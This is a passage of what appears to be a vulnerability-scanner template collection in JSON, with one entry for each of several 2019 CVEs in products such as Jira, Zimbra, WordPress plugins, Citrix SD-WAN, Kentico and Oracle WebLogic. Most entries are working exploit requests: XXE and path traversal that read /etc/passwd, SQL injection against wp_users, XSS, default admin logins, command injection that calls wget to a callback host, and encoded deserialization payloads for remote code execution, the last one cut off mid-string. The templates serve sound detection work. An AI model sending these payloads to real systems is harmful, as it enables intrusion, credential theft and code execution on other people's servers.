== 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Manager","License:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains_any(body, \"\\\"users\\\":\",\"\\\"usuario\\\":\")","contains_all(body, \"\\\"total\\\":\", \"\\\"header\\\":\")","status_code == 200 || status_code == 404"],"condition":"and"},{"type":"word","part":"body","words":["total\":0"],"negative":true}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2N